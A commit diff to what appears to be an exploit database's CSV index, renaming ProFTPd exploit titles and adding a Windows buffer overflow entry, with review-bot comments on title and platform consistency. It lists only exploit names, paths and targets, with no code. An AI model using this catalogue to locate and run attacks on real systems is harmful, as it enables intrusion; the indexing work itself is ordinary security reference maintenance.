DB: 2017-08-30
10 new exploits

ProFTPd 1.2.0 (rc2) - memory leakage example Exploit
ProFTPd 1.2.0pre10 - Remote Denial of Service
ProFTPd 1.2.0 rc2 - Memory Leakage Exploit
ProFTPd 1.2.0 pre10 - Remote Denial of Service
ProFTPd 1.3.0a - (mod_ctrls support) Local Buffer Overflow (PoC)
ProFTPd 1.3.0a - 'mod_ctrls support' Local Buffer Overflow (PoC)
ProFTPd mod_sftp - Integer Overflow Denial of Service (PoC)
ProFTPd - 'mod_sftp' Integer Overflow Denial of Service (PoC)
ProFTPd 1.2 - SIZE Remote Denial of Service
ProFTPd 1.2 - 'SIZE' Remote Denial of Service
ProFTPd 1.2.x - STAT Command Denial of Service
ProFTPd 1.2.x - 'STAT' Denial of Service
ProFTPd - (ftpdctl) Local pr_ctrls_connect
ProFTPd - 'ftpdctl' 'pr_ctrls_connect' Exploit
ProFTPd 1.3.0/1.3.0a - (mod_ctrls support) Local Buffer Overflow (1)
ProFTPd 1.3.0/1.3.0a - (mod_ctrls support) Local Buffer Overflow (2)
ProFTPd 1.3.0/1.3.0a - 'mod_ctrls support' Local Buffer Overflow (1)
ProFTPd 1.3.0/1.3.0a - 'mod_ctrls support' Local Buffer Overflow (2)
ProFTPd 1.3.0/1.3.0a - (mod_ctrls) Local Overflow (exec-shield)
ProFTPd 1.3.0/1.3.0a - 'mod_ctrls' Local Overflow (exec-shield)
ProFTPd 1.3.0 - mod_ctrls Local Stack Overflow (OpenSUSE)
ProFTPd 1.3.0 (OpenSUSE) - 'mod_ctrls' Local Stack Overflow
Easy Vedio to PSP Converter 1.6.20 - Buffer Overflow (SEH)
ProFTPd 1.2.9RC1 - 'mod_sql' SQL Injection
ProFTPd 1.2.9 RC1 - 'mod_sql' SQL Injection
ProFTPd 1.3.0 - (sreplace) Remote Stack Overflow (Metasploit)
ProFTPd 1.3.0 - 'sreplace' Remote Stack Overflow (Metasploit)
ProFTPd 1.x (module mod_tls) - Remote Buffer Overflow
ProFTPd 1.x - 'mod_tls module' Remote Buffer Overflow
ProFTPd 1.3.2rc3 < 1.3.3b (Linux) - Telnet IAC Buffer Overflow (Metasploit)
ProFTPd 1.2 < 1.3.0 (Linux) - sreplace Buffer Overflow (Metasploit)
ProFTPd 1.3.2 rc3 < 1.3.3b (Linux) - Telnet IAC Buffer Overflow (Metasploit)
ProFTPd 1.2 < 1.3.0 (Linux) - 'sreplace' Buffer Overflow (Metasploit)
ProFTPd 1.3.2rc3 < 1.3.3b (FreeBSD) - Telnet IAC Buffer Overflow (Metasploit)
ProFTPd 1.3.2 rc3 < 1.3.3b (FreeBSD) - Telnet IAC Buffer Overflow (Metasploit)
FreeBSD ftpd and ProFTPd on FreeBSD - Remote Command Execution
ftpd / ProFTPd (FreeBSD) - Remote Command Execution
ProFTPd 1.2 pre6 - snprintf Exploit
ProFTPd 1.2 pre6 - 'snprintf' Remote Root Exploit
D-Link DIR-645 / DIR-815 - diagnostic.php Command Execution (Metasploit)
D-Link DIR-645 / DIR-815 - 'diagnostic.php' Command Execution (Metasploit)
D-Link DIR615h - OS Command Injection (Metasploit)
D-Link DIR-615H - OS Command Injection (Metasploit)
ProFTPd 1.3.5 - (mod_copy) Remote Command Execution
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution
ProFTPd 1.3.5 - 'Mod_Copy' Command Execution (Metasploit)
ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit)
QNAP Transcode Server - Command Execution (Metasploit)
D-Link DIR-600 / DIR-300 (rev B) - Multiple Vulnerabilities
D-Link DIR-600 / DIR-300 (Rev B) - Multiple Vulnerabilities
D-Link DIR-615 rev H - Multiple Vulnerabilities
D-Link DIR-615 Rev H - Multiple Vulnerabilities
D-Link DIR-615 Hardware rev D3 / DIR-300 Hardware rev A - Multiple Vulnerabilities
D-Link DIR-615 Rev D3 / DIR-300 Rev A - Multiple Vulnerabilities
D-Link DIR-615 Hardware vE4 Firmware 5.10 - Cross-Site Request Forgery
D-Link DIR-615 vE4 Firmware 5.10 - Cross-Site Request Forgery
D-Link DIR-600L Hardware Version AX Firmware 1.00 - Cross-Site Request Forgery
D-Link DIR-600L AX 1.00 - Cross-Site Request Forgery
NethServer 7.3.1611 - Cross-Site Request Forgery / Cross-Site Scripting
NethServer 7.3.1611 - Cross-Site Request Forgery (Create User / Enable SSH Access)
D-Link DIR-600 - Authentication Bypass
Car or Cab Booking Script - Authentication Bypass
PHP Appointment Booking Script - Authentication Bypass
User Login and Management - Multiple Vulnerabilities
PHP Video Battle Script 1.0 - SQL Injection
Brickcom IP Camera - Credentials Disclosure
parent e3a111f58c
commit 13819fd065
12 changed files with 675 additions and 29 deletions
66
files.csv
|
@ -34,8 +34,8 @@ id,file,description,date,author,platform,type,port
|
|||
236,platforms/linux/dos/236.sh,"RedHat 6.1/6.2 - TTY Flood Users Exploit",2001-01-02,teleh0r,linux,dos,0
|
||||
238,platforms/linux/dos/238.c,"ml2 - Local users can Crash processes",2001-01-03,Stealth,linux,dos,0
|
||||
240,platforms/solaris/dos/240.sh,"Solaris 2.6 / 7 / 8 - Lock Users Out of mailx Exploit",2001-01-03,Optyx,solaris,dos,0
|
||||
241,platforms/linux/dos/241.c,"ProFTPd 1.2.0 (rc2) - memory leakage example Exploit",2001-01-03,"Piotr Zurawski",linux,dos,21
|
||||
244,platforms/linux/dos/244.java,"ProFTPd 1.2.0pre10 - Remote Denial of Service",2001-01-12,JeT-Li,linux,dos,21
|
||||
241,platforms/linux/dos/241.c,"ProFTPd 1.2.0 rc2 - Memory Leakage Exploit",2001-01-03,"Piotr Zurawski",linux,dos,21
|
||||
244,platforms/linux/dos/244.java,"ProFTPd 1.2.0 pre10 - Remote Denial of Service",2001-01-12,JeT-Li,linux,dos,21
|
||||
251,platforms/linux/dos/251.c,"APC UPS 3.7.2 - 'apcupsd' Local Denial of Service",2001-01-15,"the itch",linux,dos,0
|
||||
262,platforms/hardware/dos/262.pl,"Cisco Multiple Products - Automated Exploit Tool",2001-01-27,hypoclear,hardware,dos,0
|
||||
264,platforms/novell/dos/264.c,"Novell BorderManager Enterprise Edition 3.5 - Denial of Service",2001-05-07,honoriak,novell,dos,0
|
||||
|
@ -436,7 +436,7 @@ id,file,description,date,author,platform,type,port
|
|||
2916,platforms/windows/dos/2916.php,"Golden FTP server 1.92 - (USER/PASS) Heap Overflow (PoC)",2006-12-11,rgod,windows,dos,0
|
||||
2922,platforms/windows/dos/2922.txt,"Microsoft Word Document - Malformed Pointer (PoC)",2006-12-12,DiscoJonny,windows,dos,0
|
||||
2926,platforms/windows/dos/2926.py,"Crob FTP Server 3.6.1 build 263 - (LIST/NLST) Denial of Service",2006-12-13,shinnai,windows,dos,0
|
||||
2928,platforms/linux/dos/2928.py,"ProFTPd 1.3.0a - (mod_ctrls support) Local Buffer Overflow (PoC)",2006-12-13,"Core Security",linux,dos,0
|
||||
2928,platforms/linux/dos/2928.py,"ProFTPd 1.3.0a - 'mod_ctrls support' Local Buffer Overflow (PoC)",2006-12-13,"Core Security",linux,dos,0
|
||||
2929,platforms/windows/dos/2929.cpp,"Microsoft Internet Explorer 7 - (DLL-load Hijacking) Code Execution (PoC)",2006-12-14,"Aviv Raff",windows,dos,0
|
||||
2934,platforms/windows/dos/2934.php,"Sambar FTP Server 6.4 - (SIZE) Remote Denial of Service",2006-12-15,rgod,windows,dos,0
|
||||
2935,platforms/windows/dos/2935.sh,"Microsoft Windows Media Player 9/10 - '.mid' Denial of Service",2006-12-15,sehato,windows,dos,0
|
||||
|
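Review bot: In the renamed row 2928 the quotes now enclose 'mod_ctrls support', so the word "support" becomes part of the quoted component name, while rows 3730 and 10044 in this same commit quote 'mod_ctrls' alone. Suggest "ProFTPd 1.3.0a - 'mod_ctrls' Local Buffer Overflow (PoC)" so that a search for the quoted module name returns every mod_ctrls entry; the same applies to rows 3330 and 3333.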
@ -1885,7 +1885,7 @@ id,file,description,date,author,platform,type,port
|
|||
16108,platforms/multiple/dos/16108.txt,"VideoLAN VLC Media Player 1.1 - Subtitle 'StripTags()' Function Memory Corruption",2011-02-03,"Harry Sintonen",multiple,dos,0
|
||||
16120,platforms/windows/dos/16120.py,"Hanso Player 1.4.0.0 - Buffer Overflow Skinfile (Denial of Service)",2011-02-06,badc0re,windows,dos,0
|
||||
16121,platforms/windows/dos/16121.py,"Hanso Converter 1.1.0 - BufferOverflow Denial of Service",2011-02-06,badc0re,windows,dos,0
|
||||
16129,platforms/linux/dos/16129.txt,"ProFTPd mod_sftp - Integer Overflow Denial of Service (PoC)",2011-02-07,kingcope,linux,dos,0
|
||||
16129,platforms/linux/dos/16129.txt,"ProFTPd - 'mod_sftp' Integer Overflow Denial of Service (PoC)",2011-02-07,kingcope,linux,dos,0
|
||||
16166,platforms/windows/dos/16166.py,"Microsoft Windows Server 2003 - AD Unauthenticated BROWSER ELECTION Remote Heap Overflow",2011-02-14,Cupidon-3005,windows,dos,0
|
||||
16150,platforms/windows/dos/16150.py,"XM Easy Personal FTP Server 5.8.0 - 'TYPE' Denial of Service",2011-02-10,"Houssam Sahli",windows,dos,0
|
||||
16180,platforms/windows/dos/16180.py,"BWMeter 5.4.0 - '.csv' Denial of Service",2011-02-17,b0telh0,windows,dos,0
|
||||
|
@ -2480,7 +2480,7 @@ id,file,description,date,author,platform,type,port
|
|||
20532,platforms/sco/dos/20532.txt,"ScreenOS 1.73/2.x - Firewall Denial of Service",2001-01-08,Nsfocus,sco,dos,0
|
||||
20534,platforms/multiple/dos/20534.txt,"WebMaster ConferenceRoom 1.8 Developer Edition - Denial of Service",2001-01-10,"Murat - 2",multiple,dos,0
|
||||
20535,platforms/linux/dos/20535.txt,"(Linux Kernel) ReiserFS 3.5.28 - Potential Code Execution / Denial of Service",2001-01-09,"Marc Lehmann",linux,dos,0
|
||||
20536,platforms/linux/dos/20536.java,"ProFTPd 1.2 - SIZE Remote Denial of Service",2000-12-20,JeT-Li,linux,dos,0
|
||||
20536,platforms/linux/dos/20536.java,"ProFTPd 1.2 - 'SIZE' Remote Denial of Service",2000-12-20,JeT-Li,linux,dos,0
|
||||
20705,platforms/multiple/dos/20705.py,"SAP NetWeaver Dispatcher 7.0 ehp1/2 - Multiple Vulnerabilities",2012-08-21,"Core Security",multiple,dos,0
|
||||
20552,platforms/windows/dos/20552.html,"Microsoft Internet Explorer 4 / Outlook 2000/5.5 - 'MSHTML.dll' Crash",2001-01-15,"Thor Larholm",windows,dos,0
|
||||
20558,platforms/multiple/dos/20558.txt,"Apache 1.2 - Denial of Service",1997-12-30,"Michal Zalewski",multiple,dos,0
|
||||
|
@ -2744,7 +2744,7 @@ id,file,description,date,author,platform,type,port
|
|||
22062,platforms/hardware/dos/22062.py,"Linksys Devices 1.42/1.43 - GET Request Buffer Overflow",2002-12-03,"Core Security",hardware,dos,0
|
||||
22068,platforms/unix/dos/22068.pl,"Apache 1.3.x + Tomcat 4.0.x/4.1.x (Mod_JK) - Chunked Encoding Denial of Service",2002-12-04,Sapient2003,unix,dos,0
|
||||
22074,platforms/osx/dos/22074.txt,"Apple Mac OSX 10.2.2 - Directory Kernel Panic Denial of Service",2002-11-07,shibby,osx,dos,0
|
||||
22079,platforms/linux/dos/22079.sh,"ProFTPd 1.2.x - STAT Command Denial of Service",2002-12-09,"Rob klein Gunnewiek",linux,dos,0
|
||||
22079,platforms/linux/dos/22079.sh,"ProFTPd 1.2.x - 'STAT' Denial of Service",2002-12-09,"Rob klein Gunnewiek",linux,dos,0
|
||||
22081,platforms/windows/dos/22081.pl,"Mollensoft Software Enceladus Server Suite 3.9 - FTP Command Buffer Overflow",2002-12-09,"Tamer Sahin",windows,dos,0
|
||||
22100,platforms/windows/dos/22100.txt,"Microsoft Internet Explorer 9 - Cross-Site Scripting Filter Bypass",2012-10-19,"Jean Pascal Pereira",windows,dos,0
|
||||
22105,platforms/linux/dos/22105.c,"Linux Kernel 2.2 - 'mmap()' Local Denial of Service",2002-12-17,"Michal Zalewski",linux,dos,0
|
||||
|
@ -5781,7 +5781,7 @@ id,file,description,date,author,platform,type,port
|
|||
381,platforms/windows/local/381.c,"RhinoSoft Serv-U FTP Server 3.x < 5.x - Privilege Escalation",2004-08-08,"Andrés Acunha",windows,local,0
|
||||
388,platforms/windows/local/388.c,"OllyDbg 1.10 - Format String",2004-08-10,"Ahmet Cihan",windows,local,0
|
||||
393,platforms/linux/local/393.c,"LibPNG 1.2.5 - 'png_jmpbuf()' Local Buffer Overflow",2004-08-13,anonymous,linux,local,0
|
||||
394,platforms/linux/local/394.c,"ProFTPd - (ftpdctl) Local pr_ctrls_connect",2004-08-13,pi3,linux,local,0
|
||||
394,platforms/linux/local/394.c,"ProFTPd - 'ftpdctl' 'pr_ctrls_connect' Exploit",2004-08-13,pi3,linux,local,0
|
||||
395,platforms/windows/local/395.c,"AOL Instant Messenger AIM - 'Away' Message Local Exploit",2004-08-14,mandragore,windows,local,0
|
||||
396,platforms/bsd/local/396.c,"OpenBSD ftp - Exploit",2002-01-01,Teso,bsd,local,0
|
||||
401,platforms/windows/local/401.c,"IPSwitch IMail Server 8.1 - Local Password Decryption Utility",2004-08-18,Adik,windows,local,0
|
||||
|
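Review bot: The new title for row 394, "ProFTPd - 'ftpdctl' 'pr_ctrls_connect' Exploit", drops the word "Local" that the old title carried, and the other local ProFTPd rows touched by this commit (3330, 3333, 3730, 10044) all keep it. Suggest keeping "Local" in the title so the attack vector is readable from the description column without consulting the type column.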
@ -6066,8 +6066,8 @@ id,file,description,date,author,platform,type,port
|
|||
3220,platforms/windows/local/3220.c,"Multiple Printer Providers (spooler service) - Privilege Escalation",2007-01-29,"Andres Tarasco",windows,local,0
|
||||
3260,platforms/windows/local/3260.txt,"Microsoft Word 2000 - Unspecified Code Execution",2007-02-03,xCuter,windows,local,0
|
||||
3273,platforms/tru64/local/3273.ksh,"HP Tru64 Alpha OSF1 5.1 - (ps) Information Leak Exploit",2007-02-06,bunker,tru64,local,0
|
||||
3330,platforms/linux/local/3330.pl,"ProFTPd 1.3.0/1.3.0a - (mod_ctrls support) Local Buffer Overflow (1)",2007-02-18,Revenge,linux,local,0
|
||||
3333,platforms/linux/local/3333.pl,"ProFTPd 1.3.0/1.3.0a - (mod_ctrls support) Local Buffer Overflow (2)",2007-02-19,Revenge,linux,local,0
|
||||
3330,platforms/linux/local/3330.pl,"ProFTPd 1.3.0/1.3.0a - 'mod_ctrls support' Local Buffer Overflow (1)",2007-02-18,Revenge,linux,local,0
|
||||
3333,platforms/linux/local/3333.pl,"ProFTPd 1.3.0/1.3.0a - 'mod_ctrls support' Local Buffer Overflow (2)",2007-02-19,Revenge,linux,local,0
|
||||
3342,platforms/windows/local/3342.c,"News Rover 12.1 Rev 1 - Remote Stack Overflow (1)",2007-02-20,Marsu,windows,local,0
|
||||
3349,platforms/windows/local/3349.c,"News Bin Pro 5.33 - '.nbi' Local Buffer Overflow",2007-02-21,Marsu,windows,local,0
|
||||
3356,platforms/linux/local/3356.sh,"Nortel SSL VPN Linux Client 6.0.3 - Privilege Escalation",2007-02-21,"Jon Hart",linux,local,0
|
||||
|
@ -6113,7 +6113,7 @@ id,file,description,date,author,platform,type,port
|
|||
3692,platforms/windows/local/3692.c,"IrfanView 3.99 - '.ani' Local Buffer Overflow (2)",2007-04-09,"Breno Silva Pinto",windows,local,0
|
||||
3695,platforms/windows/local/3695.c,"Microsoft Windows - Animated Cursor '.ani' Local Overflow",2007-04-09,"Breno Silva Pinto",windows,local,0
|
||||
3727,platforms/windows/local/3727.c,"VCDGear 3.56 Build 050213 - (FILE) Local Code Execution",2007-04-13,InTeL,windows,local,0
|
||||
3730,platforms/linux/local/3730.txt,"ProFTPd 1.3.0/1.3.0a - (mod_ctrls) Local Overflow (exec-shield)",2007-04-13,Xpl017Elz,linux,local,0
|
||||
3730,platforms/linux/local/3730.txt,"ProFTPd 1.3.0/1.3.0a - 'mod_ctrls' Local Overflow (exec-shield)",2007-04-13,Xpl017Elz,linux,local,0
|
||||
3755,platforms/windows/local/3755.c,"Microsoft Windows - GDI Privilege Escalation (MS07-017) (2)",2007-04-17,"Lionel d'Hauenens",windows,local,0
|
||||
3757,platforms/windows/local/3757.txt,"OllyDbg 1.10 - Local Format String",2007-04-17,jamikazu,windows,local,0
|
||||
3772,platforms/windows/local/3772.c,"PhotoFiltre Studio 8.1.1 - '.tif' Local Buffer Overflow",2007-04-21,Marsu,windows,local,0
|
||||
|
@ -6577,7 +6577,7 @@ id,file,description,date,author,platform,type,port
|
|||
10018,platforms/linux/local/10018.sh,"Linux Kernel 2.6.32 - 'pipe.c' Privilege Escalation (4)",2009-11-12,"Earl Chew",linux,local,0
|
||||
10038,platforms/linux/local/10038.txt,"proc File - Descriptors Directory Permissions Bypass",2009-10-23,"Pavel Machek",linux,local,0
|
||||
10039,platforms/windows/local/10039.txt,"GPG4Win GNU - Privacy Assistant (PoC)",2009-10-23,Dr_IDE,windows,local,0
|
||||
10044,platforms/unix/local/10044.pl,"ProFTPd 1.3.0 - mod_ctrls Local Stack Overflow (OpenSUSE)",2009-10-12,"Michael Domberg",unix,local,0
|
||||
10044,platforms/unix/local/10044.pl,"ProFTPd 1.3.0 (OpenSUSE) - 'mod_ctrls' Local Stack Overflow",2009-10-12,"Michael Domberg",unix,local,0
|
||||
10060,platforms/linux/local/10060.sh,"Geany .18 - Local File Overwrite",2009-10-06,"Jeremy Brown",linux,local,0
|
||||
10072,platforms/multiple/local/10072.c,"Multiple Vendor - TLS Protocol Session Renegotiation Security",2009-11-12,"Marsh Ray",multiple,local,0
|
||||
10076,platforms/osx/local/10076.c,"VMware Fusion 2.0.5 - vmx86 kext Kernel Privilege Escalation",2009-10-02,mu-b,osx,local,0
|
||||
|
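Review bot: Row 10044 now names OpenSUSE in the title but still sits under platforms/unix/local with platform "unix", whereas the other mod_ctrls local rows in this commit (3330, 3333, 3730) are filed as "linux". Since the rename makes the Linux distribution explicit, consider moving the file and platform column to linux, or leave a reason for the unix classification, so that a platform filter for linux finds this entry.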
@ -9220,6 +9220,7 @@ id,file,description,date,author,platform,type,port
|
|||
42565,platforms/windows/local/42565.py,"Easy DVD Creator 2.5.11 - Buffer Overflow (SEH)",2017-08-26,tr0ubl3m4k3r,windows,local,0
|
||||
42567,platforms/windows/local/42567.py,"Easy WMV/ASF/ASX to DVD Burner 2.3.11 - Buffer Overflow (SEH)",2017-08-28,"Touhid M.Shaikh",windows,local,0
|
||||
42568,platforms/windows/local/42568.py,"Easy RM RMVB to DVD Burner 1.8.11 - Buffer Overflow (SEH)",2017-08-28,"Touhid M.Shaikh",windows,local,0
|
||||
42586,platforms/windows/local/42586.py,"Easy Vedio to PSP Converter 1.6.20 - Buffer Overflow (SEH)",2017-08-28,"Kishan Sharma",windows,local,0
|
||||
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
|
||||
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
|
||||
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
|
||||
|
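Review bot: The added row 42586 spells the product "Easy Vedio to PSP Converter"; please confirm this matches the vendor's own product name before it lands. If it is the vendor's spelling it should stay as is, since entries are looked up by product name; if it is a typo for "Video", fix it in this row and in the exploit file header together.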
@ -9245,7 +9246,7 @@ id,file,description,date,author,platform,type,port
|
|||
39,platforms/linux/remote/39.c,"Atftpd 0.6 - 'atftpdx.c' Remote Command Execution",2003-06-10,gunzip,linux,remote,69
|
||||
41,platforms/linux/remote/41.pl,"mnoGoSearch 3.1.20 - Remote Command Execution",2003-06-10,pokleyzz,linux,remote,80
|
||||
42,platforms/windows/remote/42.c,"Winmail Mail Server 2.3 - Remote Format String",2003-06-11,ThreaT,windows,remote,25
|
||||
43,platforms/linux/remote/43.pl,"ProFTPd 1.2.9RC1 - 'mod_sql' SQL Injection",2003-06-19,Spaine,linux,remote,21
|
||||
43,platforms/linux/remote/43.pl,"ProFTPd 1.2.9 RC1 - 'mod_sql' SQL Injection",2003-06-19,Spaine,linux,remote,21
|
||||
45,platforms/windows/remote/45.c,"Yahoo Messenger 5.5 - 'DSR-ducky.c' Remote Exploit",2003-06-23,Rave,windows,remote,80
|
||||
46,platforms/linux/remote/46.c,"Kerio MailServer 5.6.3 - Remote Buffer Overflow",2003-06-27,B-r00t,linux,remote,25
|
||||
48,platforms/windows/remote/48.c,"Microsoft Windows Media Services - Remote Exploit (MS03-022)",2003-07-01,firew0rker,windows,remote,80
|
||||
|
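Review bot: Row 43 is renamed to "ProFTPd 1.2.9 RC1" with an upper-case "RC", while the other release-candidate versions normalized in this commit are lower-case ("1.2.0 rc2" in row 241, "1.3.2 rc3" in rows 16851 and 16878). Suggest "ProFTPd 1.2.9 rc1 - 'mod_sql' SQL Injection" so that version strings follow one convention across the ProFTPd entries.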
@ -9766,7 +9767,7 @@ id,file,description,date,author,platform,type,port
|
|||
2809,platforms/windows/remote/2809.py,"Microsoft Windows - NetpManageIPCConnect - Stack Overflow (MS06-070) (Python)",2006-11-18,"Winny Thomas",windows,remote,445
|
||||
2821,platforms/windows/remote/2821.c,"XMPlay 3.3.0.4 - '.PLS' Local/Remote Buffer Overflow",2006-11-21,"Greg Linares",windows,remote,0
|
||||
2837,platforms/multiple/remote/2837.sql,"Oracle 9i/10g - (read/write/execute) Exploitation Suite",2006-11-23,"Marco Ivaldi",multiple,remote,0
|
||||
2856,platforms/linux/remote/2856.pm,"ProFTPd 1.3.0 - (sreplace) Remote Stack Overflow (Metasploit)",2006-11-27,"Evgeny Legerov",linux,remote,21
|
||||
2856,platforms/linux/remote/2856.pm,"ProFTPd 1.3.0 - 'sreplace' Remote Stack Overflow (Metasploit)",2006-11-27,"Evgeny Legerov",linux,remote,21
|
||||
2858,platforms/linux/remote/2858.c,"Evince Document Viewer - (DocumentMedia) Buffer Overflow",2006-11-28,K-sPecial,linux,remote,0
|
||||
2865,platforms/windows/remote/2865.rb,"3Com TFTP Service (3CTftpSvc) 2.0.1 - 'Long Transporting Mode' Overflow",2006-11-30,cthulhu,windows,remote,69
|
||||
2866,platforms/windows/remote/2866.html,"Acer LunchApp.APlunch - (ActiveX Control) Command Execution",2006-11-30,"Tan Chew Keong",windows,remote,0
|
||||
|
@ -9992,7 +9993,7 @@ id,file,description,date,author,platform,type,port
|
|||
4292,platforms/windows/remote/4292.cpp,"Diskeeper 9 - Remote Memory Disclosure",2007-08-17,Pravus,windows,remote,0
|
||||
4299,platforms/windows/remote/4299.html,"eCentrex VOIP Client module - 'uacomx.ocx 2.0.1' Remote Buffer Overflow",2007-08-21,rgod,windows,remote,0
|
||||
4301,platforms/windows/remote/4301.cpp,"Mercury/32 Mail SMTPD 4.51 - SMTPD CRAM-MD5 Unauthenticated Remote Overflow",2007-08-22,ZhenHan.Liu,windows,remote,25
|
||||
4312,platforms/linux/remote/4312.c,"ProFTPd 1.x (module mod_tls) - Remote Buffer Overflow",2007-08-24,netris,linux,remote,21
|
||||
4312,platforms/linux/remote/4312.c,"ProFTPd 1.x - 'mod_tls module' Remote Buffer Overflow",2007-08-24,netris,linux,remote,21
|
||||
4315,platforms/linux/remote/4315.py,"SIDVault LDAP Server - Unauthenticated Remote Buffer Overflow",2007-08-25,"Joxean Koret",linux,remote,389
|
||||
4316,platforms/windows/remote/4316.cpp,"Mercury/32 Mail Server 3.32 < 4.51 - SMTP Unauthenticated EIP Overwrite",2007-08-26,Heretic2,windows,remote,25
|
||||
4321,platforms/linux/remote/4321.rb,"BitchX 1.1 Final - MODE Remote Heap Overflow",2007-08-27,bannedit,linux,remote,0
|
||||
|
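Review bot: In row 4312 the new title quotes 'mod_tls module', which puts the generic word "module" inside the quoted component name; the other module names in this commit are quoted on their own ('mod_sql', 'mod_copy', 'mod_sftp'). Suggest "ProFTPd 1.x - 'mod_tls' Remote Buffer Overflow".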
@ -11413,8 +11414,8 @@ id,file,description,date,author,platform,type,port
|
|||
16848,platforms/linux/remote/16848.rb,"Unreal Tournament 2004 (Linux) - 'secure' Overflow (Metasploit)",2010-09-20,Metasploit,linux,remote,0
|
||||
16849,platforms/linux/remote/16849.rb,"MySQL yaSSL (Linux) - SSL Hello Message Buffer Overflow (Metasploit)",2010-05-09,Metasploit,linux,remote,0
|
||||
16850,platforms/linux/remote/16850.rb,"MySQL - yaSSL CertDecoder::GetName Buffer Overflow (Metasploit)",2010-04-30,Metasploit,linux,remote,0
|
||||
16851,platforms/linux/remote/16851.rb,"ProFTPd 1.3.2rc3 < 1.3.3b (Linux) - Telnet IAC Buffer Overflow (Metasploit)",2011-01-09,Metasploit,linux,remote,0
|
||||
16852,platforms/linux/remote/16852.rb,"ProFTPd 1.2 < 1.3.0 (Linux) - sreplace Buffer Overflow (Metasploit)",2011-01-09,Metasploit,linux,remote,0
|
||||
16851,platforms/linux/remote/16851.rb,"ProFTPd 1.3.2 rc3 < 1.3.3b (Linux) - Telnet IAC Buffer Overflow (Metasploit)",2011-01-09,Metasploit,linux,remote,0
|
||||
16852,platforms/linux/remote/16852.rb,"ProFTPd 1.2 < 1.3.0 (Linux) - 'sreplace' Buffer Overflow (Metasploit)",2011-01-09,Metasploit,linux,remote,0
|
||||
16853,platforms/linux/remote/16853.rb,"Berlios GPSD - Format String (Metasploit)",2010-04-30,Metasploit,linux,remote,0
|
||||
16854,platforms/hardware/remote/16854.rb,"Linksys WRT54 (Access Point) - apply.cgi Buffer Overflow (Metasploit)",2010-09-24,Metasploit,hardware,remote,0
|
||||
16855,platforms/linux/remote/16855.rb,"PeerCast 0.1216 (Linux) - URL Handling Buffer Overflow (Metasploit)",2010-09-20,Metasploit,linux,remote,0
|
||||
|
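Review bot: Rows 16851 and 16852 are retitled but keep port 0, while the other remote ProFTPd rows in this commit carry port 21 (43, 2856, 4312), and row 2856 covers the same 'sreplace' overflow as 16852. If these two modules also target the FTP control port, set the port column to 21 here so that port-based lookups return a consistent set of ProFTPd entries.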
@ -11436,7 +11437,7 @@ id,file,description,date,author,platform,type,port
|
|||
16874,platforms/osx/remote/16874.rb,"Apple Mac OSX EvoCam Web Server - HTTP GET Buffer Overflow (Metasploit)",2010-10-09,Metasploit,osx,remote,0
|
||||
16875,platforms/osx/remote/16875.rb,"Samba 3.0.10 (OSX) - 'lsa_io_trans_names' Heap Overflow (Metasploit)",2010-04-05,Metasploit,osx,remote,0
|
||||
16876,platforms/osx_ppc/remote/16876.rb,"Samba 2.2.8 (OSX/PPC) - 'trans2open' Overflow (Metasploit)",2010-06-21,Metasploit,osx_ppc,remote,0
|
||||
16878,platforms/linux/remote/16878.rb,"ProFTPd 1.3.2rc3 < 1.3.3b (FreeBSD) - Telnet IAC Buffer Overflow (Metasploit)",2010-12-02,Metasploit,linux,remote,0
|
||||
16878,platforms/linux/remote/16878.rb,"ProFTPd 1.3.2 rc3 < 1.3.3b (FreeBSD) - Telnet IAC Buffer Overflow (Metasploit)",2010-12-02,Metasploit,linux,remote,0
|
||||
16880,platforms/bsd_x86/remote/16880.rb,"Samba 2.2.8 (*BSD x86) - 'trans2open' Overflow Exploit (Metasploit)",2010-06-17,Metasploit,bsd_x86,remote,0
|
||||
16887,platforms/linux/remote/16887.rb,"HP OpenView Network Node Manager (OV NNM) - connectedNodes.ovpl Remote Command Execution (Metasploit)",2010-07-03,Metasploit,linux,remote,0
|
||||
16888,platforms/linux/remote/16888.rb,"SquirrelMail PGP Plugin - Command Execution (SMTP) (Metasploit)",2010-08-25,Metasploit,linux,remote,0
|
||||
|
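Review bot: Row 16878 is titled "(FreeBSD)" but its path is platforms/linux/remote/16878.rb and its platform column is "linux", and the rename leaves that mismatch in place. Row 18181 in this commit shows that a freebsd platform directory exists; consider reclassifying 16878 to freebsd so that a platform filter agrees with the title.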
@ -11631,7 +11632,7 @@ id,file,description,date,author,platform,type,port
|
|||
18171,platforms/multiple/remote/18171.rb,"Java Applet Rhino Script Engine - Remote Code Execution (Metasploit)",2011-11-30,Metasploit,multiple,remote,0
|
||||
18172,platforms/hardware/remote/18172.rb,"CTEK SkyRouter 4200/4300 - Command Execution (Metasploit)",2011-11-30,Metasploit,hardware,remote,0
|
||||
18179,platforms/jsp/remote/18179.html,"IBM Lotus Domino Server Controller - Authentication Bypass",2011-11-30,"Alexey Sintsov",jsp,remote,0
|
||||
18181,platforms/freebsd/remote/18181.txt,"FreeBSD ftpd and ProFTPd on FreeBSD - Remote Command Execution",2011-12-01,kingcope,freebsd,remote,0
|
||||
18181,platforms/freebsd/remote/18181.txt,"ftpd / ProFTPd (FreeBSD) - Remote Command Execution",2011-12-01,kingcope,freebsd,remote,0
|
||||
18182,platforms/windows/remote/18182.txt,"Serv-U FTP Server - Jail Break",2011-12-01,kingcope,windows,remote,0
|
||||
18183,platforms/windows/remote/18183.rb,"AVID Media Composer Phonetic Indexer - Remote Stack Buffer Overflow (Metasploit)",2011-12-01,"Nick Freeman",windows,remote,0
|
||||
18187,platforms/windows/remote/18187.c,"CoDeSys SCADA 2.3 - Remote Exploit",2011-12-01,"Celil Ünüver",windows,remote,0
|
||||
|
@ -11871,7 +11872,7 @@ id,file,description,date,author,platform,type,port
|
|||
19494,platforms/windows/remote/19494.c,"NetcPlus SmartServer 3.5.1 - SMTP Buffer Overflow",1999-09-13,UNYUN,windows,remote,0
|
||||
19495,platforms/windows/remote/19495.c,"Computalynx CMail 2.3 SP2/2.4 - SMTP Buffer Overflow",1999-09-13,UNYUN,windows,remote,0
|
||||
19496,platforms/windows/remote/19496.c,"FuseWare FuseMail 2.7 - POP Mail Buffer Overflow",1999-09-13,UNYUN,windows,remote,0
|
||||
